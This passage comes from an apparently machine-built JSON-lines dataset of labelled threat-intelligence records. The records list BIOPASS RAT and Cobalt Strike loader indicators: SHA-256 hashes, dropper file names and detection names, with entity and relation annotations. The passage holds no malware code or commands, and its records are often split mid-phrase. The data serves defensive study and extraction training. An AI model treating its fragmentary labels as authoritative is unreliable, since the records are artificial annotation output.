Script (Cdaemon module)","entities":[{"id":10182,"label":"malware","start_offset":98,"end_offset":109},{"id":10181,"label":"SHA2","start_offset":19,"end_offset":83},{"id":48983,"label":"FILEPATH","start_offset":85,"end_offset":96},{"id":48984,"label":"malware","start_offset":1,"end_offset":17}],"relations":[{"id":542,"from_id":10181,"to_id":10182,"type":"indicates"},{"id":543,"from_id":48983,"to_id":10182,"type":"indicates"},{"id":544,"from_id":48983,"to_id":10181,"type":"duplicate-of"},{"id":545,"from_id":48984,"to_id":10182,"type":"duplicate-of"}],"Comments":[]} -{"id":3366,"text":"Trojan.","entities":[],"relations":[],"Comments":[]} -{"id":3367,"text":"Python.BIOPASS.A","entities":[{"id":48985,"label":"malware","start_offset":0,"end_offset":16}],"relations":[],"Comments":[]} -{"id":3368,"text":" 40ab025d455083500bfb0c7c64e78967d4d06f91580912dccf332498681ebaf6","entities":[{"id":10183,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} -{"id":3369,"text":"cdaemon.txt BIOPASS RAT Python Script (Cdaemon module) Trojan","entities":[{"id":10184,"label":"malware","start_offset":13,"end_offset":24},{"id":48986,"label":"FILEPATH","start_offset":0,"end_offset":11}],"relations":[{"id":547,"from_id":48986,"to_id":10184,"type":"indicates"}],"Comments":[]} -{"id":3370,"text":".Python.BIOPASS.A e479823aa41d3f6416233dba8e765cf2abaa38ad18328859a20b88df7f1d88d5 sc2.txt BIOPASS RAT encoded Cobalt Strike shellcode Trojan.Win32.COBEACON.A e567fd0f08fdafc5a89c9084373f3308ef464918ff7e4ecd7fb3135d777e946d sc3.txt","entities":[{"id":10186,"label":"malware","start_offset":94,"end_offset":105},{"id":10187,"label":"tools","start_offset":114,"end_offset":127},{"id":10188,"label":"SHA2","start_offset":164,"end_offset":228},{"id":10185,"label":"SHA2","start_offset":19,"end_offset":83},{"id":48989,"label":"malware","start_offset":139,"end_offset":162},{"id":48987,"label":"malware","start_offset":1,"end_offset":17},{"id":48988,"label":"FILEPATH","start_offset":85,"end_offset":92},{"id":48990,"label":"FILEPATH","start_offset":230,"end_offset":237}],"relations":[{"id":548,"from_id":10185,"to_id":10186,"type":"indicates"},{"id":549,"from_id":48988,"to_id":10186,"type":"indicates"},{"id":553,"from_id":10187,"to_id":48989,"type":"related-to"},{"id":550,"from_id":48987,"to_id":10186,"type":"duplicate-of"},{"id":551,"from_id":10185,"to_id":48988,"type":"duplicate-of"},{"id":552,"from_id":10186,"to_id":10187,"type":"uses"},{"id":554,"from_id":10188,"to_id":48989,"type":"indicates"},{"id":555,"from_id":48990,"to_id":48989,"type":"indicates"},{"id":556,"from_id":48989,"to_id":10186,"type":"duplicate-of"}],"Comments":[]} -{"id":3371,"text":"BIOPASS RAT encoded Cobalt Strike shellcode Trojan.Win32.COBEACON.A 0c8c11d0206c223798d83d8498bb21231bbeb30536a20ea29a5d9273bc63313d s.txt BIOPASS RAT encoded Cobalt Strike shellcode Trojan.Win32.COBEACON.A 2beabd8a9d9a485ab6d850f67ec25abbd66bf97b933ecc13cf0d63198e9ba26e x.txt Python script of Cobalt Strike shellcode loader Trojan.Python.COBEACON.A 00977e254e744d4a242b552d055afe9d6429a5c3adb4ba169f302a53ba31795d 1-CS-443.lua LUA script of Cobalt Strike shellcode loader Trojan.Win32.COBEACON.BG dbb6c40cb1a49f4d1a5adc7f215e8e15f80b9f0b11db34c84e74a99e41671e06 Online.txt BIOPASS RAT Python Script (local online server) Trojan.Python.BIOPASS.A 943e8c9b0a0a37237ec429cb8a3ff3b39097949e6c57baf43918a34b0110dd8f getwechatdb.txt BIOPASS RAT Python Script (getwechatdb plugin script) TrojanSpy.Python.BIOPASS.A 760fe7645134100301c69289a366bb92ab14927a7fbb9b405c1352989f16488c wechat.txt BIOPASS RAT Python Script (getwechatdb plugin script) TrojanSpy.Python.BIOPASS.A bdf7ebb2b38ea0c3dfb13da5d9cc56bf439d0519b29c3da61d2b2c0ab5bc6011 xss_spoof.zip BIOPASS RAT Python Script (xss_spoof plugin package) Trojan.Python.BIOPASS.A e3183f52a388774545882c6148613c67a99086e5eb8d17a37158fc599ba8254b x.js XSS watering hole attack script Trojan.JS.BIOPASS.A d3956e237066a7c221cc4aaec27935d53f14db8ab4b1c018c84f6fccfd5d0058 script.txt XSS attack JavaScript payload Trojan.JS.BIOPASS.A 4e804bde376dc02daedf7674893470be633f8e2bda96fa64878bb1fcf3209f60 xss.txt XSS attack HTML payload Trojan.HTML.BIOPASS.A 05d1c273a4caeae787b2c3faf381b5480b27d836cd6e41266f3eb505dcee6186 flash.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 09530096643b835cff71a1e48020866fd0d4d0f643fe07f96acdcd06ce11dfa4 test-ticker.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10189,"label":"malware","start_offset":0,"end_offset":11},{"id":10190,"label":"tools","start_offset":20,"end_offset":33},{"id":10191,"label":"SHA2","start_offset":70,"end_offset":134},{"id":10192,"label":"malware","start_offset":143,"end_offset":154},{"id":10194,"label":"SHA2","start_offset":213,"end_offset":277},{"id":10196,"label":"SHA2","start_offset":361,"end_offset":425},{"id":10198,"label":"SHA2","start_offset":513,"end_offset":577},{"id":10199,"label":"malware","start_offset":591,"end_offset":602},{"id":10200,"label":"SHA2","start_offset":665,"end_offset":729},{"id":10201,"label":"malware","start_offset":748,"end_offset":759},{"id":10203,"label":"malware","start_offset":909,"end_offset":920},{"id":10204,"label":"SHA2","start_offset":992,"end_offset":1056},{"id":10205,"label":"malware","start_offset":1073,"end_offset":1084},{"id":10214,"label":"malware","start_offset":1608,"end_offset":1619},{"id":10215,"label":"SHA2","start_offset":1654,"end_offset":1718},{"id":10216,"label":"malware","start_offset":1737,"end_offset":1748},{"id":10193,"label":"tools","start_offset":163,"end_offset":176},{"id":10202,"label":"SHA2","start_offset":831,"end_offset":895},{"id":10206,"label":"SHA2","start_offset":1152,"end_offset":1216},{"id":10211,"label":"SHA2","start_offset":1408,"end_offset":1472},{"id":10213,"label":"SHA2","start_offset":1531,"end_offset":1595},{"id":48995,"label":"malware","start_offset":335,"end_offset":359},{"id":48996,"label":"malware","start_offset":428,"end_offset":440},{"id":49000,"label":"FILEPATH","start_offset":731,"end_offset":746},{"id":49007,"label":"attack-pattern","start_offset":1224,"end_offset":1255},{"id":49008,"label":"malware","start_offset":1257,"end_offset":1276},{"id":49009,"label":"SHA2","start_offset":1278,"end_offset":1342},{"id":49010,"label":"FILEPATH","start_offset":1344,"end_offset":1354},{"id":49002,"label":"FILEPATH","start_offset":897,"end_offset":907},{"id":49012,"label":"malware","start_offset":1387,"end_offset":1406},{"id":48998,"label":"FILEPATH","start_offset":579,"end_offset":589},{"id":49001,"label":"malware","start_offset":803,"end_offset":829},{"id":49004,"label":"FILEPATH","start_offset":1058,"end_offset":1071},{"id":49005,"label":"malware","start_offset":1127,"end_offset":1150},{"id":49006,"label":"FILEPATH","start_offset":1218,"end_offset":1222},{"id":49011,"label":"attack-pattern","start_offset":1356,"end_offset":1366},{"id":48991,"label":"malware","start_offset":45,"end_offset":68},{"id":48992,"label":"FILEPATH","start_offset":136,"end_offset":141},{"id":48993,"label":"malware","start_offset":188,"end_offset":211},{"id":48994,"label":"FILEPATH","start_offset":279,"end_offset":284},{"id":48997,"label":"malware","start_offset":488,"end_offset":512},{"id":48999,"label":"malware","start_offset":640,"end_offset":663},{"id":49003,"label":"malware","start_offset":964,"end_offset":990},{"id":49013,"label":"FILEPATH","start_offset":1474,"end_offset":1481},{"id":49014,"label":"attack-pattern","start_offset":1483,"end_offset":1493},{"id":49015,"label":"malware","start_offset":1508,"end_offset":1529},{"id":49016,"label":"FILEPATH","start_offset":1597,"end_offset":1606},{"id":49017,"label":"malware","start_offset":1628,"end_offset":1652},{"id":49018,"label":"FILEPATH","start_offset":1720,"end_offset":1735}],"relations":[],"Comments":[]} -{"id":3372,"text":"Win32.BIOPASS.A","entities":[{"id":49019,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} -{"id":3373,"text":" 0b16dfa3e0bbcc7b04a9a43309e911059a4d8c5892b1068e0441b177960d3eee","entities":[{"id":10217,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} -{"id":3374,"text":"Silverlight_ins.exe BIOPASS RAT Loader","entities":[{"id":10218,"label":"malware","start_offset":21,"end_offset":32},{"id":49020,"label":"FILEPATH","start_offset":0,"end_offset":19}],"relations":[{"id":557,"from_id":49020,"to_id":10218,"type":"indicates"}],"Comments":[]} -{"id":3375,"text":" Backdoor.Win64.BIOPASS.A 0f18694b400e14eb995003541f16f75a5afc2478cc415a6295d171ba93565a82 flash_installer.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 11b785e77cbfa2d3849575cdfabd85d41bae3f2e0d33a77e7e2c46a45732d6e4 System.exe","entities":[{"id":10219,"label":"SHA2","start_offset":27,"end_offset":91},{"id":10220,"label":"malware","start_offset":114,"end_offset":125},{"id":49022,"label":"FILEPATH","start_offset":93,"end_offset":112},{"id":10221,"label":"SHA2","start_offset":160,"end_offset":224},{"id":49021,"label":"malware","start_offset":1,"end_offset":25},{"id":49023,"label":"malware","start_offset":134,"end_offset":158},{"id":49024,"label":"FILEPATH","start_offset":226,"end_offset":236}],"relations":[{"id":558,"from_id":10219,"to_id":10220,"type":"indicates"},{"id":559,"from_id":49022,"to_id":10220,"type":"indicates"},{"id":560,"from_id":10221,"to_id":49023,"type":"indicates"},{"id":561,"from_id":49024,"to_id":49023,"type":"indicates"},{"id":562,"from_id":49023,"to_id":10220,"type":"duplicate-of"},{"id":563,"from_id":49021,"to_id":10220,"type":"duplicate-of"},{"id":564,"from_id":10219,"to_id":49022,"type":"duplicate-of"},{"id":565,"from_id":10221,"to_id":49024,"type":"duplicate-of"}],"Comments":[]} -{"id":3376,"text":"BIOPASS RAT Loader Backdoor.","entities":[{"id":10222,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":3377,"text":"Win64.BIOPASS.A","entities":[{"id":49025,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} -{"id":3378,"text":" 2243c10b1bd64dfb55eda08bc8b85610d7fa5ba759527b4b4dd16dfac584ef25","entities":[{"id":10223,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} -{"id":3379,"text":"test3.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 281c938448e32eb12fe8c5439ef06cea848668cf57fed5ad64b9a8d1e07de561","entities":[{"id":10224,"label":"malware","start_offset":11,"end_offset":22},{"id":10225,"label":"SHA2","start_offset":57,"end_offset":121},{"id":49026,"label":"FILEPATH","start_offset":0,"end_offset":9},{"id":49027,"label":"malware","start_offset":31,"end_offset":55}],"relations":[{"id":566,"from_id":49026,"to_id":10224,"type":"indicates"},{"id":567,"from_id":10225,"to_id":10224,"type":"indicates"},{"id":568,"from_id":49027,"to_id":10224,"type":"duplicate-of"},{"id":569,"from_id":49026,"to_id":10225,"type":"duplicate-of"}],"Comments":[]} -{"id":3380,"text":"flash1.exe ","entities":[{"id":49028,"label":"malware","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} -{"id":3381,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 2b580af1cdc4655ae75ef503aba7600e05cdd68b056a9354a2184b7fbb24db6f Silverlight_ins.exe ","entities":[{"id":10226,"label":"malware","start_offset":0,"end_offset":11},{"id":10227,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49029,"label":"malware","start_offset":20,"end_offset":44},{"id":49030,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":570,"from_id":10226,"to_id":49029,"type":"duplicate-of"},{"id":571,"from_id":10227,"to_id":49029,"type":"indicates"},{"id":572,"from_id":49030,"to_id":49029,"type":"indicates"},{"id":573,"from_id":49030,"to_id":10227,"type":"duplicate-of"}],"Comments":[]} -{"id":3382,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 30a65a54acfbf8d412ade728cad86c5c769befa4e456f7c0e552e1ab0862a446 flash-64.exe","entities":[{"id":10228,"label":"malware","start_offset":0,"end_offset":11},{"id":10229,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49032,"label":"FILEPATH","start_offset":112,"end_offset":124},{"id":49031,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":574,"from_id":49032,"to_id":10229,"type":"duplicate-of"},{"id":575,"from_id":10228,"to_id":49031,"type":"duplicate-of"},{"id":576,"from_id":49032,"to_id":49031,"type":"indicates"},{"id":577,"from_id":10229,"to_id":49031,"type":"indicates"}],"Comments":[]} -{"id":3383,"text":"BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 30d9ffd4b92a4ed67569a78ceb25bb6f66346d1c0a7d6d6305e235cbdfe61ebe Silverlight_ins.exe ","entities":[{"id":10230,"label":"malware","start_offset":0,"end_offset":11},{"id":10231,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49034,"label":"FILEPATH","start_offset":112,"end_offset":131},{"id":49033,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":578,"from_id":10230,"to_id":49033,"type":"duplicate-of"},{"id":579,"from_id":49034,"to_id":10231,"type":"duplicate-of"},{"id":580,"from_id":49034,"to_id":49033,"type":"indicates"},{"id":581,"from_id":10231,"to_id":49033,"type":"indicates"}],"Comments":[]} -{"id":3384,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 3195c355aa564ea66b4b37baa9547cb53dde7cf4ae7010256db92fff0bde873d flash.exe","entities":[{"id":10232,"label":"malware","start_offset":0,"end_offset":11},{"id":10233,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49035,"label":"malware","start_offset":20,"end_offset":44},{"id":49036,"label":"FILEPATH","start_offset":112,"end_offset":121}],"relations":[{"id":582,"from_id":10232,"to_id":49035,"type":"duplicate-of"},{"id":583,"from_id":49036,"to_id":10233,"type":"duplicate-of"},{"id":584,"from_id":49036,"to_id":49035,"type":"indicates"},{"id":585,"from_id":10233,"to_id":49035,"type":"indicates"}],"Comments":[]} -{"id":3385,"text":" BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 32a3934d96a8f2dae805fa28355cd0155c22ffad4545f9cd9c1ba1e9545b39ac","entities":[{"id":10234,"label":"malware","start_offset":1,"end_offset":12},{"id":10235,"label":"SHA2","start_offset":47,"end_offset":111},{"id":49037,"label":"malware","start_offset":21,"end_offset":45}],"relations":[{"id":586,"from_id":10234,"to_id":49037,"type":"duplicate-of"},{"id":587,"from_id":10235,"to_id":49037,"type":"indicates"}],"Comments":[]} -{"id":3386,"text":"test.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10236,"label":"malware","start_offset":10,"end_offset":21},{"id":49038,"label":"FILEPATH","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} -{"id":3387,"text":"Win32.BIOPASS.A","entities":[{"id":49039,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} -{"id":3388,"text":" 32c1460ba5707783f1bbaedab5e5eab21d762094106d6af8fa6b2f0f0d777c1a","entities":[{"id":10237,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} -{"id":3389,"text":"test3.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 344cdbc2a7e0908cb6638bc7b81b6b697b32755bad3bed09c511866eff3876c7","entities":[{"id":10238,"label":"malware","start_offset":11,"end_offset":22},{"id":10239,"label":"SHA2","start_offset":57,"end_offset":121},{"id":49041,"label":"malware","start_offset":31,"end_offset":55},{"id":49040,"label":"FILEPATH","start_offset":0,"end_offset":9}],"relations":[{"id":588,"from_id":49040,"to_id":49041,"type":"indicates"},{"id":589,"from_id":10238,"to_id":49041,"type":"duplicate-of"},{"id":590,"from_id":49040,"to_id":10239,"type":"duplicate-of"},{"id":591,"from_id":10239,"to_id":49041,"type":"indicates"}],"Comments":[]} -{"id":3390,"text":"test4.exe BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 3589e53c59d9807cca709387bbcaaffc7e24e15d9a78425b717fc55c779b928e","entities":[{"id":10240,"label":"malware","start_offset":11,"end_offset":22},{"id":10241,"label":"SHA2","start_offset":57,"end_offset":121},{"id":49042,"label":"FILEPATH","start_offset":0,"end_offset":9},{"id":49043,"label":"malware","start_offset":31,"end_offset":55}],"relations":[{"id":592,"from_id":49042,"to_id":49043,"type":"indicates"},{"id":593,"from_id":10241,"to_id":49043,"type":"indicates"},{"id":594,"from_id":10240,"to_id":49043,"type":"duplicate-of"},{"id":595,"from_id":49042,"to_id":10241,"type":"duplicate-of"}],"Comments":[]} -{"id":3391,"text":"flash.exe ","entities":[{"id":49044,"label":"malware","start_offset":0,"end_offset":10}],"relations":[],"Comments":[]} -{"id":3392,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 36e3fcd6a4c7c9db985be77ea6394b2ed019332fdae4739df2f96a541ea52617 Silverlight.exe","entities":[{"id":10242,"label":"malware","start_offset":0,"end_offset":11},{"id":10243,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49045,"label":"malware","start_offset":20,"end_offset":44},{"id":49046,"label":"FILEPATH","start_offset":112,"end_offset":127}],"relations":[{"id":596,"from_id":10242,"to_id":49045,"type":"duplicate-of"},{"id":597,"from_id":49046,"to_id":10243,"type":"duplicate-of"},{"id":598,"from_id":49046,"to_id":49045,"type":"indicates"},{"id":599,"from_id":10243,"to_id":49045,"type":"indicates"}],"Comments":[]} -{"id":3393,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 3e8f8b8a5f70c195a2e4d4fc7f80523809f6dbf9ead061ce8ef04fb489a577cf test-flash.exe BIOPASS RAT Loader Backdoor.Win32.BIOPASS.A 5d7aa3474e734913ecb4b820c0c546c92f7684081c519eecd3990e11a19bf2ba flash_installer.exe ","entities":[{"id":10244,"label":"malware","start_offset":0,"end_offset":11},{"id":10246,"label":"malware","start_offset":128,"end_offset":139},{"id":10245,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10247,"label":"SHA2","start_offset":174,"end_offset":238},{"id":49048,"label":"malware","start_offset":20,"end_offset":44},{"id":49047,"label":"malware","start_offset":148,"end_offset":172},{"id":49050,"label":"FILEPATH","start_offset":240,"end_offset":259},{"id":49049,"label":"FILEPATH","start_offset":112,"end_offset":126}],"relations":[{"id":600,"from_id":10244,"to_id":49048,"type":"duplicate-of"},{"id":601,"from_id":10246,"to_id":49047,"type":"duplicate-of"},{"id":602,"from_id":49049,"to_id":10245,"type":"duplicate-of"},{"id":603,"from_id":49050,"to_id":10247,"type":"duplicate-of"},{"id":604,"from_id":10247,"to_id":49047,"type":"indicates"},{"id":605,"from_id":49050,"to_id":49047,"type":"indicates"},{"id":606,"from_id":49049,"to_id":49048,"type":"indicates"},{"id":607,"from_id":10245,"to_id":49048,"type":"indicates"}],"Comments":[]} -{"id":3394,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 5fd2da648068f75a4a66b08d6d93793f735be62ae88085a79d839b6a0d6d859a flash1.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 660cef8210f823acb0b31d78fbce1d6f3f8c4f43231286f7ac69f75b2c42c020 flashplayerpp_install_cn.exe","entities":[{"id":10248,"label":"malware","start_offset":0,"end_offset":11},{"id":10249,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10250,"label":"malware","start_offset":124,"end_offset":135},{"id":10251,"label":"SHA2","start_offset":170,"end_offset":234},{"id":49052,"label":"malware","start_offset":144,"end_offset":168},{"id":49053,"label":"FILEPATH","start_offset":236,"end_offset":264},{"id":49054,"label":"FILEPATH","start_offset":112,"end_offset":122},{"id":49051,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":608,"from_id":10248,"to_id":49051,"type":"duplicate-of"},{"id":609,"from_id":10250,"to_id":49052,"type":"duplicate-of"},{"id":610,"from_id":49054,"to_id":10249,"type":"duplicate-of"},{"id":611,"from_id":49053,"to_id":10251,"type":"duplicate-of"},{"id":612,"from_id":10251,"to_id":49052,"type":"indicates"},{"id":613,"from_id":49053,"to_id":49052,"type":"indicates"},{"id":614,"from_id":49054,"to_id":49051,"type":"indicates"},{"id":615,"from_id":10249,"to_id":49051,"type":"indicates"}],"Comments":[]} -{"id":3395,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 69d930050b2445937ec6a4f9887296928bf663f7a71132676be3f112e80fe275 test.exe ","entities":[{"id":10252,"label":"malware","start_offset":0,"end_offset":11},{"id":10253,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49056,"label":"FILEPATH","start_offset":112,"end_offset":120},{"id":49055,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":616,"from_id":49056,"to_id":10253,"type":"duplicate-of"},{"id":617,"from_id":10252,"to_id":49055,"type":"duplicate-of"},{"id":619,"from_id":10253,"to_id":49055,"type":"indicates"},{"id":618,"from_id":49056,"to_id":49055,"type":"indicates"}],"Comments":[]} -{"id":3396,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 6a0976e5f9d07ff3d80fa2958976183758ba5fcdd4645e391614a347b4b8e64b f0b96efe2f714e7bddf76cc90a8b8c88_se.exe ","entities":[{"id":10254,"label":"malware","start_offset":0,"end_offset":11},{"id":10255,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10256,"label":"FILEPATH","start_offset":112,"end_offset":151},{"id":49057,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":620,"from_id":10254,"to_id":49057,"type":"duplicate-of"},{"id":621,"from_id":10256,"to_id":10255,"type":"duplicate-of"},{"id":622,"from_id":10256,"to_id":49057,"type":"indicates"},{"id":623,"from_id":10255,"to_id":49057,"type":"indicates"}],"Comments":[]} -{"id":3397,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 6ee8f6a0c514a5bd25f7a32210f4b3fe878d9d417a7ebe07befc285131bae10e news.exe","entities":[{"id":10258,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10257,"label":"malware","start_offset":0,"end_offset":11},{"id":49059,"label":"FILEPATH","start_offset":112,"end_offset":120},{"id":49058,"label":"malware","start_offset":20,"end_offset":44}],"relations":[{"id":626,"from_id":49059,"to_id":49058,"type":"indicates"},{"id":627,"from_id":10258,"to_id":49058,"type":"indicates"},{"id":624,"from_id":10257,"to_id":49058,"type":"duplicate-of"},{"id":625,"from_id":49059,"to_id":10258,"type":"duplicate-of"}],"Comments":[]} -{"id":3398,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 75e03f40a088903579a436c0d8e8bc3d0d71cf2942ad793cc948f36866a2e1ad silverlight_ins.exe ","entities":[{"id":10259,"label":"malware","start_offset":0,"end_offset":11},{"id":49060,"label":"malware","start_offset":20,"end_offset":44},{"id":10260,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49061,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":628,"from_id":49061,"to_id":10260,"type":"duplicate-of"},{"id":629,"from_id":10259,"to_id":49060,"type":"duplicate-of"},{"id":630,"from_id":10260,"to_id":49060,"type":"indicates"},{"id":631,"from_id":49061,"to_id":49060,"type":"indicates"}],"Comments":[]} -{"id":3399,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 7d0d7d416db5bd7201420982987e213a129eef2314193e4558a24f3c9a91a38e flash_installer.exe ","entities":[{"id":10261,"label":"malware","start_offset":0,"end_offset":11},{"id":10262,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49062,"label":"malware","start_offset":20,"end_offset":44},{"id":49063,"label":"FILEPATH","start_offset":112,"end_offset":131}],"relations":[{"id":632,"from_id":49063,"to_id":49062,"type":"indicates"},{"id":633,"from_id":10262,"to_id":49062,"type":"indicates"},{"id":634,"from_id":10261,"to_id":49062,"type":"duplicate-of"},{"id":635,"from_id":10262,"to_id":49063,"type":"duplicate-of"}],"Comments":[]} -{"id":3400,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 7f4e02a041ca7cfbdc79b96a890822fd7c37be67b1f6c9e07596e6aec57ccdc0 Silverlight.exe","entities":[{"id":10263,"label":"malware","start_offset":0,"end_offset":11},{"id":10264,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49064,"label":"malware","start_offset":20,"end_offset":44},{"id":49065,"label":"FILEPATH","start_offset":112,"end_offset":127}],"relations":[{"id":636,"from_id":10263,"to_id":49064,"type":"duplicate-of"},{"id":637,"from_id":49065,"to_id":10264,"type":"duplicate-of"},{"id":638,"from_id":10264,"to_id":49064,"type":"indicates"},{"id":639,"from_id":49065,"to_id":49064,"type":"indicates"}],"Comments":[]} -{"id":3401,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 8445c0189735766edf0e3d01b91f6f98563fef272ac5c92d3701a1174ad072dd Silverlight_ins.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 89c0b2036ce8d1d91f6d8b8171219aafcd6237c811770fa16edf922cedfecc54 MTYwOTI1MzEzNQ==.exe BIOPASS RAT Loader Backdoor.","entities":[{"id":10265,"label":"malware","start_offset":0,"end_offset":11},{"id":10266,"label":"SHA2","start_offset":46,"end_offset":110},{"id":10267,"label":"malware","start_offset":133,"end_offset":144},{"id":10268,"label":"SHA2","start_offset":179,"end_offset":243},{"id":10269,"label":"malware","start_offset":267,"end_offset":278},{"id":49066,"label":"malware","start_offset":20,"end_offset":44},{"id":49067,"label":"FILEPATH","start_offset":112,"end_offset":131},{"id":49068,"label":"malware","start_offset":153,"end_offset":177},{"id":49069,"label":"FILEPATH","start_offset":245,"end_offset":265}],"relations":[{"id":640,"from_id":10265,"to_id":49066,"type":"duplicate-of"},{"id":641,"from_id":49067,"to_id":10266,"type":"duplicate-of"},{"id":642,"from_id":10267,"to_id":49068,"type":"duplicate-of"},{"id":643,"from_id":10269,"to_id":49068,"type":"duplicate-of"},{"id":644,"from_id":10268,"to_id":49069,"type":"duplicate-of"},{"id":645,"from_id":49067,"to_id":49066,"type":"indicates"},{"id":646,"from_id":10266,"to_id":49066,"type":"indicates"},{"id":647,"from_id":10268,"to_id":10269,"type":"indicates"},{"id":648,"from_id":49069,"to_id":10269,"type":"indicates"}],"Comments":[]} -{"id":3402,"text":"Win64.BIOPASS.A","entities":[{"id":49070,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} -{"id":3403,"text":" 8b5d4840bbdce0798950cd5584e3d4564581a7698bc6cfb2892c97b826129cec Silverlight_ins.exe","entities":[{"id":10270,"label":"SHA2","start_offset":1,"end_offset":65},{"id":49071,"label":"FILEPATH","start_offset":67,"end_offset":86}],"relations":[{"id":649,"from_id":10270,"to_id":49071,"type":"duplicate-of"}],"Comments":[]} -{"id":3404,"text":"BIOPASS RAT Loader Backdoor.","entities":[{"id":10271,"label":"malware","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} -{"id":3405,"text":"Win64.BIOPASS.A","entities":[{"id":49072,"label":"malware","start_offset":0,"end_offset":15}],"relations":[],"Comments":[]} -{"id":3406,"text":" 932B45AB117960390324678B0696EF0E07D7F8DE1FA0B94C529F243610F1DCC9","entities":[{"id":10272,"label":"SHA2","start_offset":1,"end_offset":65}],"relations":[],"Comments":[]} -{"id":3407,"text":"flash_ins.exe ","entities":[{"id":49073,"label":"FILEPATH","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} -{"id":3408,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 98a91356e0094c96d81bd27af407dd48c3c91aaf97da6794aeb303597a773749 Silverlight1.exe","entities":[{"id":10273,"label":"malware","start_offset":0,"end_offset":11},{"id":10274,"label":"SHA2","start_offset":46,"end_offset":110},{"id":49074,"label":"malware","start_offset":20,"end_offset":44},{"id":49075,"label":"FILEPATH","start_offset":112,"end_offset":128}],"relations":[{"id":650,"from_id":10273,"to_id":49074,"type":"duplicate-of"},{"id":651,"from_id":49075,"to_id":10274,"type":"duplicate-of"},{"id":652,"from_id":49075,"to_id":49074,"type":"indicates"},{"id":653,"from_id":10274,"to_id":49074,"type":"indicates"}],"Comments":[]} -{"id":3409,"text":"BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9eed9a2e0edf38f6354f4e57b3a6b9bed5b19263f54bcee19e66fc8af0c29e4e test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9f34d28562e7e1e3721bbf679c58aa8f5898995ed999a641f26de120f3a42cf4 Silverlight1.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A 9ff906ffcde32e4c6fb3ea4652e6d6326713a7fde8bb783b52f12a1f382f8798 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A a7c4dac7176e291bd2aba860e1aa301fb5f7d880794f493f2dea0982e2b7eb31 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b48e01ff816f12125f9f4cfc9180d534c7c57ef4ee50c0ebbe445e88d4ade939 test.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b82bde3fe5ee900a76ac27b4869ed9aa0802c63bbd72b3bfb0f1abce6340cc6c Silverlight_ins.exe BIOPASS RAT Loader Backdoor.Win64.BIOPASS.A b9d0838be8952ebd4218c8f548ce94901f789ec1e32f5eaf46733f0c94c77999 Silverlight_ins.exe 